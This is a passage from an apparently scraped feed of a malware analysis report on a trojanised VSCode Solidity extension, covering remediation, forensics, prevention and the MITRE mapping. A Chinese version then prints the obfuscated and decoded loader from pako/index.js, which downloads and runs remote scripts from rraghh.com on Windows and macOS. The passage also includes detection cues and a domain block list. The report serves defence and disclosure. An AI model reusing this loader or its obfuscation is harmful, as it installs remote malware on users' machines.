class="nb">ls</span> <span class="nt">-la</span> /Library/LaunchAgents/ <span class="nb">ls</span> <span class="nt">-la</span> /Library/LaunchDaemons/ <span class="c"># Check running agents</span> launchctl list | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"updater|apple|rraghh"</span> <span class="c"># Remove suspicious agents</span> launchctl unload ~/Library/LaunchAgents/com.suspicious.plist <span class="nb">rm</span> ~/Library/LaunchAgents/com.suspicious.plist </code></pre> </div> <h4> Step 6: Check Scheduled Tasks </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># macOS/Linux</span> crontab <span class="nt">-l</span> <span class="c"># If malicious entries found:</span> crontab <span class="nt">-e</span> <span class="c"># Windows</span> schtasks /query /fo LIST /v | findstr updater schtasks /delete /tn <span class="s2">"TaskName"</span> /f </code></pre> </div> <h4> Step 7: Restart Shell </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Reload configuration</span> <span class="nb">source</span> ~/.zshrc <span class="c"># Or restart terminal</span> </code></pre> </div> <h2> Advanced Forensics </h2> <h3> Memory Analysis </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Dump process memory (macOS)</span> <span class="nb">sudo </span>gcore <span class="nt">-o</span> /tmp/updater.dump <span class="si">$(</span>pgrep updater<span class="si">)</span> <span class="c"># Analyze with strings</span> strings /tmp/updater.dump.<span class="k">*</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"http|rraghh|password|key"</span> </code></pre> </div> <h3> Network Forensics </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Capture traffic for analysis</span> <span class="nb">sudo </span>tcpdump <span class="nt">-i</span> any <span class="nt">-w</span> /tmp/capture.pcap host rraghh.com <span class="c"># Analyze with Wireshark or tshark</span> tshark <span class="nt">-r</span> /tmp/capture.pcap <span class="nt">-Y</span> <span class="s2">"http or dns"</span> </code></pre> </div> <h3> File System Timeline </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Find recently modified files</span> find ~ <span class="nt">-type</span> f <span class="nt">-mtime</span> <span class="nt">-7</span> <span class="nt">-ls</span> <span class="c"># Find recently created executables</span> find ~ <span class="nt">-type</span> f <span class="nt">-perm</span> +111 <span class="nt">-mtime</span> <span class="nt">-7</span> </code></pre> </div> <h2> Prevention Strategies </h2> <h3> For Individual Developers </h3> <ol> <li> <p><strong>Install Extensions from Official Marketplace Only</strong></p> <ul> <li>Verify publisher identity</li> <li>Check extension ratings and reviews</li> <li>Review installation count and update frequency</li> </ul> </li> <li><p><strong>Review Extension Permissions</strong><br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="w"> </span><span class="err">//</span><span class="w"> </span><span class="err">Check</span><span class="w"> </span><span class="err">package.json</span><span class="w"> </span><span class="err">for</span><span class="w"> </span><span class="err">suspicious</span><span class="w"> </span><span class="err">activationEvents</span><span class="w"> </span><span class="nl">"activationEvents"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"onStartupFinished"</span><span class="p">,</span><span class="w"> </span><span class="err">//</span><span class="w"> </span><span class="err">⚠️</span><span class="w"> </span><span class="err">Auto-runs</span><span class="w"> </span><span class="err">on</span><span class="w"> </span><span class="err">startup</span><span class="w"> </span><span class="s2">"*"</span><span class="w"> </span><span class="err">//</span><span class="w"> </span><span class="err">⚠️</span><span class="w"> </span><span class="err">Runs</span><span class="w"> </span><span class="err">on</span><span class="w"> </span><span class="err">any</span><span class="w"> </span><span class="err">event</span><span class="w"> </span><span class="p">]</span><span class="w"> </span></code></pre> </div> <ol> <li> <strong>Audit Installed Extensions Regularly</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> code <span class="nt">--list-extensions</span> <span class="nt">--show-versions</span> <span class="o">&gt;</span> extensions.txt diff extensions.txt extensions.txt.old </code></pre> </div> <ol> <li> <strong>Use Dependency Lock Files</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="c"># Verify package integrity</span> npm ci <span class="c"># Uses package-lock.json</span> </code></pre> </div> <ol> <li> <strong>Enable VSCode Security Features</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"extensions.autoCheckUpdates"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"extensions.autoUpdate"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"security.workspace.trust.enabled"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h3> For Organizations </h3> <ol> <li> <strong>Implement Extension Allowlisting</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="w"> </span><span class="err">//</span><span class="w"> </span><span class="err">settings.json</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"extensions.autoCheckUpdates"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"extensions.autoUpdate"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <ol> <li> <p><strong>Deploy Private Extension Marketplace</strong></p> <ul> <li>Host vetted extensions internally</li> <li>Scan extensions before approval</li> </ul> </li> <li><p><strong>Network-Level Protection</strong><br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight conf"><code> <span class="c"># Block malicious domains at firewall/DNS </span> <span class="n">rraghh</span>.<span class="n">com</span> <span class="n">cdn</span>.<span class="n">rraghh</span>.<span class="n">com</span> *.<span class="n">rraghh</span>.<span class="n">com</span> </code></pre> </div> <ol> <li> <p><strong>Endpoint Detection and Response (EDR)</strong></p> <ul> <li>Monitor for suspicious child processes from VSCode</li> <li>Alert on curl/wget piped to bash</li> <li>Detect PATH modifications</li> </ul> </li> <li><p><strong>File Integrity Monitoring (FIM)</strong><br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="c"># Monitor critical files</span> ~/.zshrc ~/.bash_profile ~/.local/bin/ ~/.vscode/extensions/ </code></pre> </div> <ol> <li> <strong>Security Awareness Training</strong> <ul> <li>Educate developers about supply chain attacks</li> <li>Establish incident response procedures</li> </ul> </li> </ol> <h2> MITRE ATT&amp;CK Mapping </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tactic</th> <th>Technique</th> <th>ID</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><strong>Initial Access</strong></td> <td>Supply Chain Compromise</td> <td>T1195.002</td> <td>Compromise software dependencies</td> </tr> <tr> <td><strong>Execution</strong></td> <td>Command and Scripting Interpreter</td> <td>T1059.004</td> <td>Execute bash/batch scripts</td> </tr> <tr> <td><strong>Persistence</strong></td> <td>Path Interception</td> <td>T1574.007</td> <td>Hijack PATH environment variable</td> </tr> <tr> <td><strong>Defense Evasion</strong></td> <td>Obfuscated Files or Information</td> <td>T1027</td> <td>Unicode escaping, XOR obfuscation</td> </tr> <tr> <td><strong>Defense Evasion</strong></td> <td>Subvert Trust Controls</td> <td>T1553.001</td> <td>Remove Gatekeeper quarantine attributes</td> </tr> <tr> <td><strong>Command and Control</strong></td> <td>Web Protocols</td> <td>T1071.001</td> <td>HTTPS for C&amp;C communication</td> </tr> </tbody> </table></div> <h2> Attribution Analysis </h2> <h3> Threat Actor Profile </h3> <p><strong>Sophistication Level</strong>: Intermediate to Advanced</p> <p><strong>Capabilities:</strong></p> <ul> <li>JavaScript obfuscation techniques</li> <li>Cross-platform malware development</li> <li>Supply chain attack methodology</li> <li>Infrastructure management (CDN usage)</li> </ul> <p><strong>Targeting:</strong></p> <ul> <li>Blockchain/Web3 developers (Solidity focus)</li> <li>Cryptocurrency wallet theft potential</li> <li>Supply chain compromise for downstream attacks</li> </ul> <p><strong>Infrastructure:</strong></p> <ul> <li>CDN-based payload distribution</li> <li>Domain privacy protection</li> <li>Likely cloud-hosted C&amp;C servers</li> </ul> <h3> Similar Campaigns </h3> <ol> <li> <p><strong>event-stream (2018)</strong></p> <ul> <li>npm package compromised</li> <li>Targeted cryptocurrency wallets</li> <li>Affected 8 million downloads</li> </ul> </li> <li> <p><strong>ua-parser-js (2021)</strong></p> <ul> <li>npm package hijacked</li> <li>Deployed cryptocurrency miners</li> <li>Affected millions of projects</li> </ul> </li> <li> <p><strong>VSCode "prettiest" (2023)</strong></p> <ul> <li>Fake code formatter extension</li> <li>Stole credentials and tokens</li> <li>Removed from marketplace</li> </ul> </li> </ol> <h2> Timeline </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Date</th> <th>Event</th> </tr> </thead> <tbody> <tr> <td><strong>2026-03-25</strong></td> <td>Malicious extension packaged (VSIX timestamp)</td> </tr> <tr> <td><strong>2026-03-26 16:27</strong></td> <td>Extension files extracted locally</td> </tr> <tr> <td><strong>2026-03-27</strong></td> <td>User installs extension</td> </tr> <tr> <td><strong>2026-03-28 02:33</strong></td> <td>Suspicious process "apple" detected (PID 3009)</td> </tr> <tr> <td><strong>2026-03-28 03:00+</strong></td> <td>Analysis and remediation begins</td> </tr> </tbody> </table></div> <h2> Recommendations </h2> <h3> Immediate Actions </h3> <ol> <li>✅ <strong>Uninstall the extension immediately</strong> </li> <li>✅ <strong>Run full system malware scan</strong> </li> <li>✅ <strong>Change all passwords and API keys</strong> </li> <li>✅ <strong>Review cryptocurrency wallet activity</strong> </li> <li>✅ <strong>Check for unauthorized access to accounts</strong> </li> </ol> <h3> Short-term Actions </h3> <ol> <li>🔍 <strong>Audit all installed VSCode extensions</strong> </li> <li>🔍 <strong>Review recent system and network activity</strong> </li> <li>🔍 <strong>Scan all projects for injected code</strong> </li> <li>🔍 <strong>Notify team members if extension was shared</strong> </li> </ol> <h3> Long-term Actions </h3> <ol> <li>🛡️ <strong>Implement extension vetting process</strong> </li> <li>🛡️ <strong>Deploy EDR/FIM solutions</strong> </li> <li>🛡️ <strong>Establish security monitoring</strong> </li> <li>🛡️ <strong>Conduct security awareness training</strong> </li> </ol> <h2> Reporting </h2> <p>If you have been affected by this malware or have additional information:</p> <h3> Report to VSCode Security Team </h3> <ul> <li> <strong>GitHub</strong>: <a href="https://github.com/microsoft/vscode/security/advisories/new" rel="noopener noreferrer">https://github.com/microsoft/vscode/security/advisories/new</a> </li> <li> <strong>Email</strong>: <a href="mailto:secure@microsoft.com">secure@microsoft.com</a> </li> </ul> <h3> Report to npm Security Team </h3> <ul> <li> <strong>Email</strong>: <a href="mailto:security@npmjs.com">security@npmjs.com</a> </li> <li> <strong>HackerOne</strong>: <a href="https://hackerone.com/npmjs" rel="noopener noreferrer">https://hackerone.com/npmjs</a> </li> </ul> <h3> Share IOCs with Community </h3> <ul> <li> <strong>Twitter</strong>: Use hashtag #VSCodeMalware</li> <li> <strong>Reddit</strong>: r/netsec, r/vscode</li> <li> <strong>Security Mailing Lists</strong>: Full Disclosure, BugTraq</li> </ul> <h2> References </h2> <ol> <li> <p><strong>VSCode Extension Security</strong></p> <ul> <li><a href="https://code.visualstudio.com/api/references/extension-manifest" rel="noopener noreferrer">https://code.visualstudio.com/api/references/extension-manifest</a></li> <li><a href="https://code.visualstudio.com/docs/editor/extension-marketplace" rel="noopener noreferrer">https://code.visualstudio.com/docs/editor/extension-marketplace</a></li> </ul> </li> <li> <p><strong>npm Security Best Practices</strong></p> <ul> <li><a href="https://docs.npmjs.com/packages-and-modules/securing-your-code" rel="noopener noreferrer">https://docs.npmjs.com/packages-and-modules/securing-your-code</a></li> <li><a href="https://docs.npmjs.com/cli/v8/commands/npm-audit" rel="noopener noreferrer">https://docs.npmjs.com/cli/v8/commands/npm-audit</a></li> </ul> </li> <li> <p><strong>macOS Security</strong></p> <ul> <li>Gatekeeper: <a href="https://support.apple.com/en-us/HT202491" rel="noopener noreferrer">https://support.apple.com/en-us/HT202491</a> </li> <li>XProtect: <a href="https://support.apple.com/guide/security/" rel="noopener noreferrer">https://support.apple.com/guide/security/</a> </li> </ul> </li> <li> <p><strong>MITRE ATT&amp;CK Framework</strong></p> <ul> <li><a href="https://attack.mitre.org/" rel="noopener noreferrer">https://attack.mitre.org/</a></li> <li><a href="https://attack.mitre.org/techniques/T1195/002/" rel="noopener noreferrer">https://attack.mitre.org/techniques/T1195/002/</a></li> </ul> </li> <li> <p><strong>Supply Chain Attack Resources</strong></p> <ul> <li>CISA: <a href="https://www.cisa.gov/supply-chain" rel="noopener noreferrer">https://www.cisa.gov/supply-chain</a> </li> <li>NIST: <a href="https://csrc.nist.gov/projects/supply-chain-risk-management" rel="noopener noreferrer">https://csrc.nist.gov/projects/supply-chain-risk-management</a> </li> </ul> </li> </ol> <h2> Disclaimer </h2> <p>This report is provided for security research and educational purposes only. The information should not be used for malicious purposes. The author is not responsible for any misuse of the techniques described herein.</p> <h2> Contact </h2> <p>For questions or additional information about this analysis:</p> <ul> <li> <strong>Report Issues</strong>: Create an issue on GitHub</li> <li> <strong>Security Researchers</strong>: Contact via security mailing lists</li> <li> <strong>Media Inquiries</strong>: Please cite this report appropriately</li> </ul> <p><strong>Report Generated</strong>: March 28, 2026<br> <strong>Analysis Tools</strong>: Claude Code, VSCode, macOS system utilities<br> <strong>Report Version</strong>: 1.0 (English)</p> <h2> Acknowledgments </h2> <p>Thanks to the security community for their ongoing efforts to identify and mitigate supply chain attacks. Stay vigilant and always verify your dependencies.</p> <p><strong>#StaySafeOnline #SupplyChainSecurity #VSCodeSecurity</strong></p> cybersecurity security solidity vscode VSCode 插件solidity-macos恶意扩展深度分析报告 长风 Fri, 27 Mar 2026 19:32:17 +0000 https://dev.to/changfeng/vscode-cha-jian-solidity-macose-yi-kuo-zhan-shen-du-fen-xi-bao-gao-2ipn https://dev.to/changfeng/vscode-cha-jian-solidity-macose-yi-kuo-zhan-shen-du-fen-xi-bao-gao-2ipn <h2> 概述 </h2> <p>本报告详细分析了一个伪装成 Solidity 开发工具的恶意 VSCode 扩展 <code>iolitelabs.solidity-macos-0.1.8</code>。该扩展通过供应链攻击手段,在依赖包中注入恶意代码,实现跨平台后门植入。连接<a href="https://marketplace.visualstudio.com/items?itemName=IoliteLabs.solidity-macos" rel="noopener noreferrer">https://marketplace.visualstudio.com/items?itemName=IoliteLabs.solidity-macos</a><br> github代码为8年前的,恶意代码依然在线未下架。</p> <p><strong>威胁等级:高危 🔴</strong></p> <h2> 基本信息 </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>项目</th> <th>内容</th> </tr> </thead> <tbody> <tr> <td>扩展名称</td> <td>solidity-macos</td> </tr> <tr> <td>发布者</td> <td>IoliteLabs</td> </tr> <tr> <td>版本</td> <td>0.1.8</td> </tr> <tr> <td>伪装身份</td> <td>Solidity 智能合约开发插件</td> </tr> <tr> <td>攻击类型</td> <td>供应链攻击 (Supply Chain Attack)</td> </tr> <tr> <td>影响平台</td> <td>Windows, macOS</td> </tr> <tr> <td>C&amp;C 域名</td> <td> <code>rraghh.com</code>, <code>cdn.rraghh.com</code> </td> </tr> </tbody> </table></div> <h2> 攻击链分析 </h2> <h3> 1. 感染入口 </h3> <p>恶意代码位于:<code>extension/node_modules/pako/index.js</code></p> <p><strong>正常的 pako 库</strong>是一个合法的 JavaScript 压缩库,但攻击者篡改了其入口文件。</p> <h3> 2. 恶意代码详解 </h3> <h4> 原始混淆代码 </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">var</span> <span class="nx">_0xd35d</span><span class="o">=</span><span class="p">(</span><span class="mi">965581</span><span class="o">^</span><span class="mi">965578</span><span class="p">)</span><span class="o">+</span><span class="p">(</span><span class="mi">724804</span><span class="o">^</span><span class="mi">724800</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">cp</span><span class="o">=</span><span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0069</span><span class="se">\</span><span class="s2">u006C</span><span class="se">\</span><span class="s2">u0064</span><span class="se">\</span><span class="s2">u005F</span><span class="se">\</span><span class="s2">u0070</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0065</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0073</span><span class="dl">"</span><span class="p">);</span> <span class="nx">_0xd35d</span><span class="o">=</span><span class="mi">176481</span><span class="o">^</span><span class="mi">176486</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="nx">process</span><span class="p">[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0070</span><span class="se">\</span><span class="s1">u006C</span><span class="se">\</span><span class="s1">u0061</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0066</span><span class="se">\</span><span class="s1">u006F</span><span class="se">\</span><span class="s1">u0072</span><span class="se">\</span><span class="s1">u006D</span><span class="dl">'</span><span class="p">]</span><span class="o">===</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0077</span><span class="se">\</span><span class="s2">u0069</span><span class="se">\</span><span class="s2">u006E</span><span class="se">\</span><span class="s2">u0033</span><span class="se">\</span><span class="s2">u0032</span><span class="dl">"</span><span class="p">){</span> <span class="nx">cp</span><span class="p">[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0078</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0063</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0075</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u006C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u006B</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u004C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u0053</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0070</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u003A</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u006D</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u006C</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0025</span><span class="se">\</span><span class="s2">u0054</span><span class="se">\</span><span class="s2">u0045</span><span class="se">\</span><span class="s2">u004D</span><span class="se">\</span><span class="s2">u0050</span><span class="se">\</span><span class="s2">u0025</span><span class="se">\</span><span class="s2">u005C</span><span class="se">\</span><span class="s2">u0031</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0026</span><span class="se">\</span><span class="s2">u0026</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0025</span><span class="se">\</span><span class="s2">u0054</span><span class="se">\</span><span class="s2">u0045</span><span class="se">\</span><span class="s2">u004D</span><span class="se">\</span><span class="s2">u0050</span><span class="se">\</span><span class="s2">u0025</span><span class="se">\</span><span class="s2">u005C</span><span class="se">\</span><span class="s2">u0031</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0022</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0064</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0061</span><span class="se">\</span><span class="s1">u0063</span><span class="se">\</span><span class="s1">u0068</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0064</span><span class="dl">'</span><span class="p">:</span><span class="o">!!</span><span class="p">[],</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0073</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0064</span><span class="se">\</span><span class="s1">u0069</span><span class="se">\</span><span class="s1">u006F</span><span class="dl">'</span><span class="p">:</span><span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span><span class="p">})[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0075</span><span class="se">\</span><span class="s1">u006E</span><span class="se">\</span><span class="s1">u0072</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0066</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span><span class="p">(</span><span class="nx">process</span><span class="p">[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0070</span><span class="se">\</span><span class="s1">u006C</span><span class="se">\</span><span class="s1">u0061</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0066</span><span class="se">\</span><span class="s1">u006F</span><span class="se">\</span><span class="s1">u0072</span><span class="se">\</span><span class="s1">u006D</span><span class="dl">'</span><span class="p">]</span><span class="o">===</span><span class="dl">"</span><span class="s2">niwrad</span><span class="dl">"</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">""</span><span class="p">).</span><span class="nf">reverse</span><span class="p">().</span><span class="nf">join</span><span class="p">(</span><span class="dl">""</span><span class="p">)){</span> <span class="nx">cp</span><span class="p">[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0078</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0063</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0075</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u006C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u0066</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0053</span><span class="se">\</span><span class="s2">u004C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0070</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u003A</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0064</span><span class="se">\</span><span class="s2">u006E</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u006D</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0064</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u007C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0068</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0064</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0061</span><span class="se">\</span><span class="s1">u0063</span><span class="se">\</span><span class="s1">u0068</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0064</span><span class="dl">'</span><span class="p">:</span><span class="o">!!</span><span class="p">[],</span><span class="dl">"</span><span class="s2">stdio</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0069</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u006E</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0065</span><span class="dl">"</span><span class="p">})[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0075</span><span class="se">\</span><span class="s1">u006E</span><span class="se">\</span><span class="s1">u0072</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0066</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> </code></pre> </div> <h4> 解码后的真实代码 </h4> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">cp</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="s2">child_process</span><span class="dl">"</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">process</span><span class="p">[</span><span class="dl">'</span><span class="s1">platform</span><span class="dl">'</span><span class="p">]</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">win32</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Windows 平台</span> <span class="nx">cp</span><span class="p">[</span><span class="dl">'</span><span class="s1">exec</span><span class="dl">'</span><span class="p">](</span> <span class="dl">'</span><span class="s1">curl -k -LSs "https://rraghh.com/gt/calc.bat" -o "%TEMP%</span><span class="se">\\</span><span class="s1">1.bat" &amp;&amp; start /b "" "%TEMP%</span><span class="se">\\</span><span class="s1">1.bat"</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">detached</span><span class="dl">'</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="dl">'</span><span class="s1">stdio</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span> <span class="p">}</span> <span class="p">)[</span><span class="dl">'</span><span class="s1">unref</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">process</span><span class="p">[</span><span class="dl">'</span><span class="s1">platform</span><span class="dl">'</span><span class="p">]</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">darwin</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// macOS 平台 ("niwrad" 反转 = "darwin")</span> <span class="nx">cp</span><span class="p">[</span><span class="dl">'</span><span class="s1">exec</span><span class="dl">'</span><span class="p">](</span> <span class="dl">'</span><span class="s1">curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">detached</span><span class="dl">'</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="dl">'</span><span class="s1">stdio</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span> <span class="p">}</span> <span class="p">)[</span><span class="dl">'</span><span class="s1">unref</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> </code></pre> </div> <h3> 3. 混淆技术分析 </h3> <div 